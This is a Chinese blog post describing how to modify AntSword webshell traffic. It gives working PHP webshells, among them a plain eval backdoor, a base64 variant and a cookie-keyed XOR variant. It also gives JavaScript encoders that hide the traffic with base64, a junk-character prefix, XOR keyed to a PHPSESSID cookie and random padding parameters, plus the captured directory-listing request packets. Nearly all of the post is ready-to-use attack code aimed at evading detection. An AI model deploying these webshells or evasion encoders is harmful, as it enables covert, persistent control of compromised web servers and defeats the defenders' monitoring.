蚁剑流量传输改造之路

1、蚁剑默认的请求：列目录

php脚本：

 <?php eval($_POST[1]);

数据包：

 1=@ini_set("display_errors", "0");@set_time_limit(0);function asenc($out){return $out;};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "f32aa";echo @asenc($output);echo "f7538";}ob_start();try{$D=base64_decode($_POST["0xfb787fcf8ad1c"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="	".$T."	".@filesize($P)."	".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();&0xfb787fcf8ad1c=RDovcGhwc3R1ZHlfcHJvL1dXVy9kei9hcGkv

2、当蚁剑使用自带的base64编码器对目标发送请求：列目录

php脚本：

 <?php eval($_POST[1]);

编码器：

 module.exports = (pwd, data, ext={}) => {
  let randomID = `_0x${Math.random().toString(16).substr(2)}`;
  data[randomID] = Buffer.from(data['_']).toString('base64');
  data[pwd] = `eval(base64_decode($_POST[${randomID}]));`;
  delete data['_'];
  return data;
}

数据包：

 1=@eval(@base64_decode($_POST[_0xb6bfd60624d9c]));&0x2ed89fbf7ba82=RDovcGhwc3R1ZHlfcHJvL1dXVy9kei9hcGkv&_0xb6bfd60624d9c=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7ZnVuY3Rpb24gYXNlbmMoJG91dCl7cmV0dXJuICRvdXQ7fTtmdW5jdGlvbiBhc291dHB1dCgpeyRvdXRwdXQ9b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7ZWNobyAiZjNiZGQiO2VjaG8gQGFzZW5jKCRvdXRwdXQpO2VjaG8gImE3OTAyIjt9b2Jfc3RhcnQoKTt0cnl7JEQ9YmFzZTY0X2RlY29kZSgkX1BPU1RbIjB4MmVkODlmYmY3YmE4MiJdKTskRj1Ab3BlbmRpcigkRCk7aWYoJEY9PU5VTEwpe2VjaG8oIkVSUk9SOi8vIFBhdGggTm90IEZvdW5kIE9yIE5vIFBlcm1pc3Npb24hIik7fWVsc2V7JE09TlVMTDskTD1OVUxMO3doaWxlKCROPUByZWFkZGlyKCRGKSl7JFA9JEQuJE47JFQ9QGRhdGUoIlktbS1kIEg6aTpzIixAZmlsZW10aW1lKCRQKSk7QCRFPXN1YnN0cihiYXNlX2NvbnZlcnQoQGZpbGVwZXJtcygkUCksMTAsOCksLTQpOyRSPSIJIi4kVC4iCSIuQGZpbGVzaXplKCRQKS4iCSIuJEUuIgoiO2lmKEBpc19kaXIoJFApKSRNLj0kTi4iLyIuJFI7ZWxzZSAkTC49JE4uJFI7fWVjaG8gJE0uJEw7QGNsb3NlZGlyKCRGKTt9O31jYXRjaChFeGNlcHRpb24gJGUpe2VjaG8gIkVSUk9SOi8vIi4kZS0+Z2V0TWVzc2FnZSgpO307YXNvdXRwdXQoKTtkaWUoKTs=

3、干扰字符配合base64编码器：列目录

php脚本

 <?php
class ade{
    public $name = '';
    function __construct($name){
        $name[0] = ''; //对第一个字符进行清除
        $name = trim($name);
        eval(base64_decode($name));
    }
}
 
new ade($_POST[1]);

编码器

 module.exports = (pwd, data) => {
  var random1 = String.fromCharCode(Math.floor(Math.random() * 26) + 65);
  data[pwd] = random1 + new Buffer(data['_']).toString('base64');
  delete data['_'];
  return data;
}

数据包：

 1=VQGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7ZnVuY3Rpb24gYXNlbmMoJG91dCl7cmV0dXJuICRvdXQ7fTtmdW5jdGlvbiBhc291dHB1dCgpeyRvdXRwdXQ9b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7ZWNobyAiNmY2MjM1NDhhIjtlY2hvIEBhc2VuYygkb3V0cHV0KTtlY2hvICI0MjJlMTA0ZDA2ODIiO31vYl9zdGFydCgpO3RyeXskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsieTIyMDg1M2U2ZjdkOGUiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiROOyRUPUBkYXRlKCJZLW0tZCBIOmk6cyIsQGZpbGVtdGltZSgkUCkpO0AkRT1zdWJzdHIoYmFzZV9jb252ZXJ0KEBmaWxlcGVybXMoJFApLDEwLDgpLC00KTskUj0iCSIuJFQuIgkiLkBmaWxlc2l6ZSgkUCkuIgkiLiRFLiIKIjtpZihAaXNfZGlyKCRQKSkkTS49JE4uIi8iLiRSO2Vsc2UgJEwuPSROLiRSO31lY2hvICRNLiRMO0BjbG9zZWRpcigkRik7fTt9Y2F0Y2goRXhjZXB0aW9uICRlKXtlY2hvICJFUlJPUjovLyIuJGUtPmdldE1lc3NhZ2UoKTt9O2Fzb3V0cHV0KCk7ZGllKCk7&y220853e6f7d8e=RDovcGhwc3R1ZHlfcHJvL1dXVy9kei8%3D

4、基于随机Cookie来加密的编码器：列目录

php木马：

 PHP木马
 
<?php
class Cookie
{
    function __construct()
    {
        $key=@$_COOKIE['PHPSESSID'];
        @$post=base64_decode($_POST['1']);
        for($i=0;$i<strlen($post);$i++){
            $post[$i] = $post[$i] ^ $key[$i%26];
        }
        return $post;
    }
    function __destruct()
    {return @eval($this->__construct());}
}
$check=new Cookie();
?>

编码器

 'use strict';
//code by yzddmr6
 
 
module.exports = (pwd, data, ext = {}) => {
  let randomID = `x${Math.random().toString(16).substr(2)}`;
 
 
  function xor(payload) {
    let crypto = require('crypto');
    let key = crypto.createHash('md5').update(randomID).digest('hex').substr(6);
    ext.opts.httpConf.headers['Cookie'] = 'PHPSESSID=' + key;
    key = key.split("").map(t => t.charCodeAt(0));
    let cipher = payload.split("").map(t => t.charCodeAt(0));
    for (let i = 0; i < cipher.length; i++) {
      cipher[i] = cipher[i] ^ key[i % 26]
    }
    cipher = cipher.map(t => String.fromCharCode(t)).join("")
    cipher = Buffer.from(cipher).toString('base64');
    return cipher;
  }
 
 
  data['_'] = Buffer.from(data['_']).toString('base64');
  data[pwd] = `eval(base64_decode("${data['_']}"));`;
  data[pwd]=xor(data[pwd]);
  delete data['_'];
 
 
  return data;
}

数据包：

 1=AURXWxpWWEFWAVVqB1YFXVwGGBQydFsUUWBdSGxvY1twX2FHAgYhQD9qVAVqbilKVVJ6TC1bQVB7XnhbeGMVdAABMAJgUGJGAWRhB1JxCEZXb2NbdHFYADtbNUY%2FAWoTUgRXVG45floGX3tYeHMAA1d0DQIAXjACXDt6QypwZRdUbjUFUGNGWV1lBl0Fcg9FBFt6C1MEWgJTKXIHAHFRR1dNa0RXbzNCB2s3C1pRelA5AWFRaAQqRFRZYFhbXGFNKnYIBAQAcgVqYVZYb1N%2BRT5lcEJ5d1IFaWAvWgFKJ1t3NHUCOgFlCH1PLQVsYHxbW0txdjhtLV8EX3UMenFaAlMpcgcAcV0AaGN3XVFOIFw6Xj8AdgliXDlnbgh%2FBVVEb1sLTl11dU4FdgRDKQFqGlVuEFhlJQFfPWp4W3xea1RpcDdfAQE0XnMgYlA2dg41ZnAXW1dwfFl0dlBAOGE6ASh2eRR%2BcghabzJbAS53bw5jcwBFaWBUXgJrL11yJmFGLAFbDHt1NnVmYwN7b2dLeiptF18%2FAFAVe3UpdWINemYxWFlBfk17Y2pvM1oqdlNEXCBycQEAYRRqdSZiVV5we1tLcWY7bSlHB2p2GVFhWkZ%2BMnlGKwEHW1B8d15WTjN7M2ZTZGwmRwEpdkBYZFoyf2JzRgdYdV9EO2YEWDJYCSJTWzVbbSZiRgdbUVxgXVJCVk4zZDNgNHd0CmJ5LEplNGBjJllvb2BYcnF5bS1iU0c8cXoqf1sIBVQYeUU1dWxHUHNvRldwDUE5YAFZbSBbRiwDdgpiYlVIUmB4Tl16elg4WCVJPGQBCVIEVgFtOXoGL3d0WlNjQV5QcDdMAWsrXXIlcUYvd3IWfHIDQnp0AgRyZkBcNF9TWiVhcRZ6cDJGfgZbXyhZdFpTY0FeUAUNAzlgAVltIFtDKlRcCHxfNnR6Xnt%2FcFhHRztcC3IHanYFanEPSnwiYmcvYV1cZmcNC3lyVUAqWl5bdApiZSwBYRJTBDFVfHJFQWlhYXgtXDFgKQEJD2kEC0V%2BImJ4KFtken0Ee1hRcFhPOWQ0QlsKV10xWlxWVmIQC28FdARgAFRYM20LWTxqelNRYVpGfiJiWi9qQltrBlFEenQrczZfLGJtCV9AL0p%2BFHpxMUZmWlZYXXcCWwIGLVs8AG0Me2IXCnhTdkwGAWAHUXxvAnh0CgI5dApecyBbAUEaHlo%3D&hcf070a6640049=RDovcGhwc3R1ZHlfcHJvL1dXVy9kei9hcmNoaXZlci8%3D

5、垃圾字符的添加配合编码器(随机Cookie)加密：列目录

 'use strict';
 
module.exports = (pwd, data, ext = {}) => {
  let varname_min = 5;
  let varname_max = 15;
  let data_min = 200;
  let data_max = 250;
  let num_min = 100;
  let num_max = 200;
  let randomID = `_0x${Math.random().toString(16).substr(2)}`;
 
 
  data[randomID] = Buffer.from(data['_']).toString('base64');
 
 
  function randomString(length) {
    //let chars='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
    let chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
    let result = '';
    for (let i = length; i > 0; --i) result += chars[Math.floor(Math.random() * chars.length)];
    return result;
  }
 
 
  function randomInt(min, max) {
    return parseInt(Math.random() * (max - min + 1) + min, 10);
  }
 
 
  for (let i = 0; i < randomInt(num_min, num_max); i++) {
    data[randomString(randomInt(varname_min, varname_max))] = randomString(randomInt(data_min, data_max));
  }
 
 
  data[pwd] = `@eval(base64_decode($_POST[${randomID}]));`;
  delete data['_'];
  return data;
}

数据包：

 1=B0MDCh1QUktUAg1nUgACC1wDTRoydFtNUDNbTzg%2BZF16VWNEWgt0Fjg8VAA%2FYClKVQt7HytcFQF8WHJRemBNeVVXN1RgVTdIAWRhXlMiDkEDPmRdfntaA2NWYBA4V2oWBwpXVG5gfwkAWC8Jf3UKCVV3VQ9VCDdUXD4vTSpwZU5VPTMCBDJBX1dvBF5df1oTAw16DgYKWgJTcHNUBnYFFlBLYU5VbGtPUj0wXVpUL145AWEIaVcsQwAIZ15RVmNOcntdUgNWcgA%2Fb1ZYbwp%2FFjhiJBN%2BcVgPa2N3V1QcIA1iIjAJLmRtUmsMKwI4MXtdUUFzdWBgeAkDCXUJL39aAlNwc1QGdglRb2V9V1NNeFFvMScMdTIjUDpZdVV8DCsCBDEMW2sLfwRgYHxVKidTUQFwKQZSQWMgMmIwFlZfBlBTY2xXfCNYMGowL28xZX1aeAkscTcNWWNlfghzam1OIzUPfig3aylXfGxFFThcBQ1ndgMBeF1wSHwgMF1iIQlBAV5xTGs2BV46V3t0ZlRrcmxURQw0IX4zNn5aZmJTdyo3BRokY3dlfXhYCUh5HDM3aDUvDyl2ZQFyNisCAzFsXVALZ11aC2QcKidqIyl8IkB6a1oNMmYrEHxbXw9rWQBBbDInDlklDUE6ZAJWazYFXDMffEF6VF5dcm9wHygnaisubw9efH9dHzoHMBZWW1RRVE1rdVAxDg1zNQ5TNloDAXgLEV42LgUEelJFDWNvTh87PEsNMFFXCn5RCQwtBlINYFsHAXhTUlF5HDNVaDUNVQdkAlJVIg5DAAoMXlZ%2FXU5dcHsKKAp6EAYKDwdvClUJBnI0CFRlYlF6Z1IXZy0jEltUCQw7AVNUVS0gBgYxWVl4fXNDWwt4FQQiAQg%2FYDFfU29dDil2CRZ6W3pRfk1rQmY2Bg9cNQ4XKXthWngIV10AMWBba2xBdWMKYFU5VnZXBlYpX1VWYwMGbSwKVltUSH5Na2t6D1ATWS4nXgdkAlBTMjdaKTJGWWZRBQ1wX1pSKyx2XyxSF19uClkTK3YwNXpIRwFoBn8Ib1cGC2o%2BDVI5a3UIUDJbQCslZ154YEVYYApeEygnciAwVCljYlJeEy5MKxN%2FdWZMYVldVFIgUAhbVStQOQFiV3oxFgwtVHNIUQtnBFpwYFUqJ1NRP38PX3x7WlJAHEtd&phfvmOuxNYfcD=QplqMhpjCkoSwwaglLPLbCiHwsdgysFAkOfbBkjlAoEuBKZuKmKSiSSBIaiHQWcaCwvBPOJRBrrehNfremOrnhaCXFcFGaKjieXkMViTINqVpkqrMpTKBIOxvaXGGCGHuByDNGsMDnjfLDqUEVCqXKXdSpQjQuopVSQVNtnFvKFNOpMBHNwUwHRjwhWhPktQxbLPVSWooYMhbaiJETsHJZcfKVfPyrhAdfYIsZJGhNHfcEQOPK&IwghkoRg=PNRmNPbtWjuAlPRUDCRlpBraYVTTbtymAuijunHNXuqhbbcXifLzkNsPbRlDUvPwFqBnmQbywTwsdXQDzmmEgkTKSNNFgOnyjNmakeAXHxDTPbPHNYYCVceFwiVDIwwPLXcqOLOkPQAcsAHuofesghCxQeDQVucWkHOfZwOVDAVWdRNqQPPznPgGshIlfWWYZyFrjztPfYmFuFMGlOiFViRmDMSawiJNgDrEHrjWCLACUQTHvodoPnYF

参考文章：https://xz.aliyun.com/t/7126#toc-5
参考文章：https://xz.aliyun.com/t/6571

posted @ 2020-04-22 23:56 zpchcbd 阅读(1117) 评论(0) 编辑收藏举报

刷新页面返回顶部

登录后才能查看或发表评论，立即登录或者逛逛博客园首页

记录部分个人学习和部分实战的笔记我会慢慢补全部分空白的文章 :)

蚁剑流量传输改造之路

我的标签

随笔档案

博客友链

	module.exports = (pwd, data, ext={}) => {
	let randomID = `_0x${Math.random().toString(16).substr(2)}`;
	data[randomID] = Buffer.from(data['_']).toString('base64');
	data[pwd] = `eval(base64_decode($_POST[${randomID}]));`;
	delete data['_'];
	return data;
	}

	<?php
	class ade{
	public $name = '';
	function __construct($name){
	$name[0] = ''; //对第一个字符进行清除
	$name = trim($name);
	eval(base64_decode($name));
	}
	}

	new ade($_POST[1]);

	module.exports = (pwd, data) => {
	var random1 = String.fromCharCode(Math.floor(Math.random() * 26) + 65);
	data[pwd] = random1 + new Buffer(data['_']).toString('base64');
	delete data['_'];
	return data;
	}

	PHP木马

	<?php
	class Cookie
	{
	function __construct()
	{
	$key=@$_COOKIE['PHPSESSID'];
	@$post=base64_decode($_POST['1']);
	for($i=0;$i<strlen($post);$i++){
	$post[$i] = $post[$i] ^ $key[$i%26];
	}
	return $post;
	}
	function __destruct()
	{return @eval($this->__construct());}
	}
	$check=new Cookie();
	?>

	'use strict';
	//code by yzddmr6


	module.exports = (pwd, data, ext = {}) => {
	let randomID = `x${Math.random().toString(16).substr(2)}`;


	function xor(payload) {
	let crypto = require('crypto');
	let key = crypto.createHash('md5').update(randomID).digest('hex').substr(6);
	ext.opts.httpConf.headers['Cookie'] = 'PHPSESSID=' + key;
	key = key.split("").map(t => t.charCodeAt(0));
	let cipher = payload.split("").map(t => t.charCodeAt(0));
	for (let i = 0; i < cipher.length; i++) {
	cipher[i] = cipher[i] ^ key[i % 26]
	}
	cipher = cipher.map(t => String.fromCharCode(t)).join("")
	cipher = Buffer.from(cipher).toString('base64');
	return cipher;
	}


	data['_'] = Buffer.from(data['_']).toString('base64');
	data[pwd] = `eval(base64_decode("${data['_']}"));`;
	data[pwd]=xor(data[pwd]);
	delete data['_'];


	return data;
	}

	'use strict';

	module.exports = (pwd, data, ext = {}) => {
	let varname_min = 5;
	let varname_max = 15;
	let data_min = 200;
	let data_max = 250;
	let num_min = 100;
	let num_max = 200;
	let randomID = `_0x${Math.random().toString(16).substr(2)}`;


	data[randomID] = Buffer.from(data['_']).toString('base64');


	function randomString(length) {
	//let chars='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
	let chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
	let result = '';
	for (let i = length; i > 0; --i) result += chars[Math.floor(Math.random() * chars.length)];
	return result;
	}


	function randomInt(min, max) {
	return parseInt(Math.random() * (max - min + 1) + min, 10);
	}


	for (let i = 0; i < randomInt(num_min, num_max); i++) {
	data[randomString(randomInt(varname_min, varname_max))] = randomString(randomInt(data_min, data_max));
	}


	data[pwd] = `@eval(base64_decode($_POST[${randomID}]));`;
	delete data['_'];
	return data;
	}

记录部分个人学习和部分实战的笔记 我会慢慢补全部分空白的文章 :)

蚁剑流量传输改造之路

我的标签

随笔档案

博客友链

记录部分个人学习和部分实战的笔记我会慢慢补全部分空白的文章 :)